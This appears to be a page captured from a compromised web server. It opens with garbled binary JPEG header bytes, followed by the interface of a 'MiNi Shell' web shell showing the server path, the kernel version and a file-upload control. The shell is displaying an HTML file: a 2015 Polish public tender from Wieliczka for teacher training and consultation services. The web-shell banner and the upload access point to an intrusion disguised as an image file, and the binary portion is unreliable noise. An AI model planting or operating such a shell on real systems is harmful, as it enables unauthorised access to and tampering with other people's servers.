JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/53508-N-2015.html

<p class="kh_header"><b>Wieliczka: Świadczenie usług szkoleniowych i konsultacyjnych w roku szkolnym 2014/2015 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim - edycja 3</b><br>
<b>Numer ogłoszenia: 53508 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Obsługi Placówek Oświatowych Powiatu , ul. Kopernika 2, 32-020 Wieliczka, woj. małopolskie, tel. 12 284 89 48, faks 12 284 89 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna powiatu wielickiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych i konsultacyjnych w roku szkolnym 2014/2015 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim - edycja 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/.Przedmiotem zamówienia jest świadczenie usług szkoleniowych i konsultacyjnych w roku szkolnym 2014/2015 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2/.Każda usługa składa się z: 
1) opracowania materiałów dydaktycznych (szkoleniowych) dla szkolenia,
2) przeprowadzenia szkolenia dla członków Rady Pedagogicznej placówki oświatowej objętej projektem w wymiarze 4 godzin,
3) ustalenia z członkami Rady Pedagogicznej placówki oświatowej objętej projektem przy jednoczesnej akceptacji Szkolnego Organizatora Rozwoju Edukacji terminów realizacji konsultacji,
4) realizacji konsultacji dla członków Rady Pedagogicznej placówki oświatowej objętej projektem w wymiarze 6 godzin. 
3/.Odbiorca usługi: Usługa przeznaczona jest dla Beneficjentów Ostatecznych projektu - członków rad pedagogicznych oraz uczestników sieci współpracy. 
4/.Miejsce realizacji usług: teren powiatu wielickiego. Usługa będzie realizowana w szkołach i przedszkolach biorących udział w projekcie, zlokalizowanych na terenie Powiatu Wielickiego.
5/.Liczba usług: 20
6/.Przewidywana ilość osób uczestnicząca w szkoleniu: średnio 20 osób
7/.Czas realizacji: usługi będą realizowane sukcesywnie od dnia podpisania umowy do dnia 30 czerwca 2015 roku. Ze względu na przyjęty harmonogram wsparcia w poszczególnych placówkch. 
Spotkania będą realizowane w dni powszednie w godzinach wolnych od nauki szkolnej (popołudnia i wieczory) oraz w soboty. 
8/.Obowiązki Wykonawcy:
1). opracowanie i przekazanie najpóźniej 3 dni przed datą realizacji szkolenia Szkolnemu Organizatorowi Rozwoju Edukacji materiałów dydaktycznych (szkoleniowych), które zostaną użyte w czasie realizacji szkolenia, 
2). realizacja kursu przez wykwalifikowane osoby, posiadające doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową,
3) po zakończeniu kursu wypełnienie z uczestnikami ankiety ewaluacyjnej, przygotowanej zgodnie z załącznikiem do umowy, dotyczącej danego rodzaju kursu,
4) prowadzenie karty konsultacji według wzoru stanowiącego załącznik do umowy i przedstawienie jej w oryginale Zamawiającemu po zakończeniu realizacji usługi.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej jedną osobą dla każdej z części, posiadającą w:
Części I   Wykształcenie wyższe. 
Doświadczenie w prowadzeniu szkoleń w zakresie projektu edukacyjnego w szkole (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce) oraz praktyczne doświadczenie w pracy metodą projektu edukacyjnego (praca w placówce edukacyjnej) lub doświadczenie we wsparciu nauczycieli w pracy tą metodą (co najmniej 3 lata)
Części II Wykształcenie: tytuł naukowy doktora z zakresu psychologii.
Doświadczenie w prowadzeniu szkoleń w zakresie projektu edukacyjnego w szkole (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce) 
Praktyczne doświadczenie w pracy metodą projektu edukacyjnego (praca w placówce edukacyjnej) lub doświadczenie we wsparciu nauczycieli w pracy tą metodą (co najmniej 3 lata)
Części III Wykształcenie wyższe
Doświadczenie w prowadzeniu szkoleń w zakresie projektu edukacyjnego w szkole (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce)
Praktyczne doświadczenie w pracy metodą projektu edukacyjnego (praca w placówce edukacyjnej) lub doświadczenie we wsparciu nauczycieli w pracy tą metodą (co najmniej 3 lata)
Części IV Wykształcenie wyższe
Doświadczenie w prowadzeniu szkoleń w zakresie projektu edukacyjnego w szkole (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce)
Praktyczne doświadczenie w pracy metodą projektu edukacyjnego (praca w placówce edukacyjnej) lub doświadczenie we wsparciu nauczycieli w pracy tą metodą (co najmniej 3 lata)
Części V Wykształcenie: wyższe, Wykształcenie: wyższe, psycholog/pedagog posiadający kwalifikacje do pracy  z osobami dorosłymi (studia podyplomowe lub kurs z zakresu andragogiki co najmniej 100 godz. lub certyfikat trenera)
Doświadczenie:  co najmniej 10 szkoleń z omawianej tematyki lub w zakresie pomiaru dydaktycznego oraz praktyczne, co najmniej 10-letnie doświadczenie w aktywnej pracy z dziećmi w wieku szkolnym.
Części VI Wykształcenie: wyższe, psycholog lub pedagog  posiadający kwalifikacje do pracy  z osobami dorosłymi (studia podyplomowe lub kurs z zakresu andragogiki co najmniej 100 godz. lub certyfikat trenera) Doświadczenie:  co najmniej 10 szkoleń z omawianej tematyki oraz praktyczne, co najmniej 10-letnie doświadczenie w aktywnej pracy z dziećmi i młodzieżą w wieku gimnazjalnym o niskiej motywacji.
Części VII Wykształcenie: wyższe, Wykształcenie: wyższe, psycholog/pedagog posiadający kwalifikacje do pracy  z osobami dorosłymi (studia podyplomowe lub kurs z zakresu andragogiki co najmniej 100 godz. lub certyfikat trenera)
Doświadczenie:  co najmniej 10 szkoleń z omawianej tematyki oraz praktyczne, co najmniej 10-letnie doświadczenie w aktywnej pracy z dziećmi w wieku szkolnym.
Części VIII Wykształcenie wyższe. Doświadczenie: w prowadzeniu
szkoleń w zakresie podstawy programowej lub w zbliżonej tematyce (co najmniej 10 szkoleń) lub 100 godzin szkoleń dla Rad Pedagogicznych.
Praktyczne doświadczenie w temacie (praca w placówce edukacyjnej lub placówce doskonalenia nauczycieli).
Części IX Wykształcenie: wyższe - psycholog, ukończenie kursu/posiadanie certyfikatu trenera. Doświadczenie: w pracy z Radami Pedagogicznymi w temacie technik uczenia i metod aktywizujących, diagnozy mocnych i słabych stron uczniów oraz dostosowania wymagań (co najmniej 5 szkoleń)
Części X Wykształcenie: wyższe - psycholog, ukończenie kursu/posiadanie certyfikatu trenera. Doświadczenie: w prowadzeniu projektów rozwojowych (co najmniej 2 lata).
Części XI Wykształcenie: wyższe: pedagog/psycholog/ fizjoterapeuta; ukończony kurs z pracy metodą W. Sherborne i Metody Dobrego Startu M. Bogdanowicz. Co najmniej 5 lat doświadczenia w prowadzeniu zajęć stymulujących rozwój ruchowy dziecka w wieku przedszkolnym
Części XII Wykształcenie: wyższe: psycholog. Doświadczenie: w prowadzeniu szkoleń dla nauczycieli w tematyce kształtowania postaw uczniowskich lub pokrewnej (co najmniej 5 szkoleń lub 25 godzin). Praktyczne doświadczenie we współpracy z młodzieżą (w tym z młodzieżą trudną, przejawiającą zachowania dysfunkcyjne) w placówce edukacyjnej lub terapeutycznej - min. 3 lata
Części XIII Wykształcenie: wyższe
Doświadczenie w prowadzeniu szkoleń w zakresie oceniania kształtującego (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce); Praktyczne doświadczenie w pracy zawodowej (pedagogicznej) z ocenianiem kształtującym - co najmniej 2 lata
Części XIV Wykształcenie: wyższe
Doświadczenie w prowadzeniu szkoleń w zakresie oceniania kształtującego (co najmniej 20 szkoleń / 100 godzin szkoleniowych w tej lub zbliżonej tematyce); Praktyczne doświadczenie w pracy zawodowej (pedagogicznej) z ocenianiem kształtującym - co najmniej 2 lata.
Części XV Wykształcenie: wyższe, Doświadczenie: doświadczenie w pracy w gimnazjum (co najmniej 2 lata) oraz doświadczenie w zakresie prowadzenia szkoleń dla Rad pedagogicznych (co najmniej 5 szkoleń o zbliżonej tematyce).
Części XVI Wykształcenie:  wyższe, psycholog,
pedagog praktyk. 
Doświadczenie: doświadczenie w pracy w gimnazjum (co najmniej 2 lata) oraz doświadczenie w zakresie prowadzenia szkoleń dla Rad pedagogicznych (co najmniej 5 szkoleń o zbliżonej tematyce
Części XVII Wykształcenie: wyższe, psycholog,
pedagog praktyk, 
Doświadczenie: doświadczenie w pracy w przedszkolu (co najmniej 2 lata) oraz doświadczenie w zakresie prowadzenia szkoleń dla Rad pedagogicznych (co najmniej 5 szkoleń o zbliżonej tematyce)
Części XVIII Wykształcenie: wyższe
Doświadczenie: w pracy z dzieckiem młodszym (co najmniej 1 rok) oraz doświadczenie w prowadzeniu warsztatów  tanecznych (co najmniej 1 rok lub 200 godzin zajęć.)
Części XIX Wykształcenie wyższe magisterskie; psycholog/pedagog, mający doświadczenie w pracy z dziećmi w wieku przedszkolnym, posiadający doświadczenie w prowadzeniu szkoleń dla Rad Pedagogicznych.
Części XX Wykształcenie: wyższe, psycholog/pedagog, mający doświadczenie w pracy z dziećmi w wieku przedszkolnym, znający specyfikę tej pracy, posiadający kwalifikacje do pracy z osobami dorosłymi, posiadający doświadczenie w prowadzeniu projektów rozwojowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program szkolenia dla każdej z wybranych części zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy. 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - bibliografia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w okresie jej obowiązywania. W przypadku zmiany okoliczności mających wpływ na wysokość składek (pochodnych od wynagrodzenia), które Zamawiający zobowiązany jest ponieść z tytułu zawarcia umowy z osobą fizyczną, Zamawiający dopuszcza możliwość przeliczenia i zmiany ceny brutto zawartej w umowie z danym Wykonawcą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Obsługi Placówek Oświatowych Powiatu, 32-020 Wieliczka ul. Kopernika 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 08:45, miejsce: Obsługi Placówek Oświatowych Powiatu, 32-020 Wieliczka ul. Kopernika 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nauczyciel 45+.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Obrońców Westerplatte w Koźmicach Wielkich.
Wymagane elementy szkolenia:  sposoby wzmocnienia sił psychicznych i odporności na stres,  profilaktyka wypalenia zawodowego oraz radzenia sobie z jego objawami, budowanie indywidualnego programu rozwoju osobistego, zarządzanie czasem wolnym,  propozycje technik relaksacyjnych; jak nie stracić głosu po latach ciężkiej pracy?; sposoby wzmocnienia sił psychicznych i odporności na stres 
Konsultacje indywidualne i grupowe w zakresie: wdrażanie wiedzy i umiejętności ze szkolenia;  udzielanie praktycznych wskazówek, ze szczególnym uwzględnieniem tematyki zdrowego stylu życia 
Preferowane metody: warsztat - metody aktywne, 
mini wykład, symulacja. Sugerowany termin realizacji usługi: marzec - kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkoła promująca wartość edukacji wraz z umiejętnością reagowania na prowokacyjne zachowania uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum w Koźmicach Wielkich.
 Wymagane elementy szkolenia: w jaki sposób szkoła (gimnazjum) może promować wartość edukacji - praktyczne wskazówki; praktyczne rozwiązania dotyczące motywowania uczniów do nauki; umiejętne planowanie i organizacja nauki (konkretne przykłady); praktyczne wskazówki dotyczące umiejętności efektywnego  uczenia się i wykorzystania wiedzy z lekcji; wzbogacenie warsztatu pracy nauczyciela gimnazjum o praktyczne metody i techniki radzenia sobie z uczniem prezentującym zachowania prowokacyjne (przykłady); sposoby przeprowadzania rozmów interwencyjnych(przykłady); prezentacja przykładowych scenariuszy przebiegu lekcji w klasie z takim uczniem; omówienie procedur i metod pokazujących jak powinna pracować szkoła mająca uczniów wykazujących zachowania prowokacyjne (przykłady); prezentacja przykładów jak powinna wyglądać komunikacja z rodzicami tego ucznia w sytuacji problemowej (przykłady - warsztat). 
Konsultacje dla nauczycieli gimnazjum  wdrażanie wiedzy i umiejętności ze szkolenia; wsparcie w projektowaniu i wdrażaniu konkretnych działań przez nauczycieli służących rozwinięciu i utrwaleniu praktyk z warsztatu - konkretne wskazówki do prac  
Preferowane metody: warsztat - metody aktywne,  mini wykład, symulacja.
Sugerowany termin realizacji usługi: marzec -  maj 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nauczyciel 45+ - szkolenie dodatkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Zofii Stryszowskiej 
w Janowicach. Wymagane elementy szkolenia:  sposoby wzmocnienia sił psychicznych i odporności na stres, profilaktyka wypalenia zawodowego oraz radzenia sobie z jego objawami; budowanie indywidualnego programu rozwoju osobistego; zarządzanie czasem wolnym; propozycje technik relaksacyjnych; jak nie stracić głosu po latach ciężkiej pracy? 
Konsultacje: wdrażanie wiedzy i umiejętności ze szkolenia;  udzielanie praktycznych wskazówek, ze szczególnym uwzględnieniem tematyki zdrowego stylu życia.
Preferowane metody: warsztat - metody aktywne,  mini wykład, symulacja.
Sugerowany termin realizacji usługi: marzec -  kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Techniki uczenia się i metody motywujące do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Liceum Ogólnokształcące im. Jana Matejki w Wieliczce. 
Wymagane elementy szkolenia: przegląd aktualnie stosowanych w Polsce i na świecie metod motywowania uczniów, wzmacniania ich kreatywności i aktywności własnej (przykłady dla nauczycieli liceum); metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów (przykłady dla nauczycieli liceum); poznanie i uporządkowanie wiedzy nt. efektywnego uczenia się (przykłady dla nauczycieli liceum); strategie i metody uczenia się oraz mnemotechniki (przykłady dla nauczycieli liceum) ; notowanie przy pomocy map myśli i zasady szybkiego czytania (przykłady dla nauczycieli liceum); umiejętne planowanie i organizacja nauki 
